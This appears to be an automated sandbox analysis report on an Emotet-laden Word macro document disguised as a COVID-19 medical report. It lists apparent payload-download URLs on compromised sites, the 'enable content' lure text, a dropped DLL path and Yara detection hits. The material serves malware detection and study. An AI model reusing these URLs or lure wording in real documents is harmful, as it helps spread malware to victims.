HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Feb 2021 21:56:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 3

Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://bhaktivrind.com
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
Source: powershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmp	String found in binary or memory: http://cab.mH
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp	String found in binary or memory: http://cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://cab.mykfn.com/admin/X/
Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp	String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/P
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://ie-best.net
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	String found in binary or memory: http://java.c
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: http://vanddnabhargave.com
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://vanddnabhargave.com/asset/W9o/
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	String found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7
Source: rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5949
Source: unknown	Process created: Commandline size = 5848
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5848	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Dgmlr\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B0D5	7_2_1001B0D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DBB2	7_2_1000DBB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014602	7_2_10014602
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002814	7_2_10002814
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001821E	7_2_1001821E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018A24	7_2_10018A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DA27	7_2_1001DA27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A82A	7_2_1000A82A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000B22A	7_2_1000B22A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000422B	7_2_1000422B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A02C	7_2_1001A02C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A82C	7_2_1001A82C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E42E	7_2_1000E42E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BA46	7_2_1000BA46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F249	7_2_1000F249
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018C4D	7_2_10018C4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001505A	7_2_1001505A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001662	7_2_10001662
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001664	7_2_10001664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D87D	7_2_1001D87D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010082	7_2_10010082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E689	7_2_1001E689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018489	7_2_10018489
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002C93	7_2_10002C93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011494	7_2_10011494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000AE9E	7_2_1000AE9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100026A0	7_2_100026A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008EA1	7_2_10008EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100112B3	7_2_100112B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E0B6	7_2_1001E0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BEBD	7_2_1000BEBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100048C7	7_2_100048C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004AD3	7_2_10004AD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100068D8	7_2_100068D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100084D8	7_2_100084D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100042DE	7_2_100042DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E4E1	7_2_1001E4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010CE0	7_2_10010CE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100038E1	7_2_100038E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012CE3	7_2_10012CE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A2E5	7_2_1001A2E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E8F6	7_2_1000E8F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001EF9	7_2_10001EF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006AFC	7_2_10006AFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007306	7_2_10007306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CF07	7_2_1001CF07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003F0A	7_2_10003F0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10013F16	7_2_10013F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018721	7_2_10018721
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019726	7_2_10019726
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C92D	7_2_1001C92D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001732F	7_2_1001732F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D535	7_2_1000D535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10016334	7_2_10016334
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014D39	7_2_10014D39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003743	7_2_10003743
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F54C	7_2_1000F54C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001894D	7_2_1001894D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010950	7_2_10010950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011F54	7_2_10011F54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CB58	7_2_1001CB58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BF69	7_2_1001BF69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007B6A	7_2_10007B6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A16A	7_2_1000A16A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019D6D	7_2_10019D6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001197B	7_2_1001197B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DD80	7_2_1001DD80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017B8D	7_2_10017B8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B598	7_2_1001B598
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001539F	7_2_1001539F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000799F	7_2_1000799F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E9A2	7_2_1001E9A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EBA4	7_2_1000EBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021C0	7_2_100021C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C1C2	7_2_1001C1C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100107D3	7_2_100107D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100095DD	7_2_100095DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D5DF	7_2_1001D5DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100129E3	7_2_100129E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F7EF	7_2_1000F7EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100033F4	7_2_100033F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A7FA	7_2_1000A7FA

Source: IU-8549 Medical report COVID-19.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open			Name: Document_open

Source: IU-8549 Medical report COVID-19.doc

OLE indicator, VBA macros: true

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@20/8@6/100

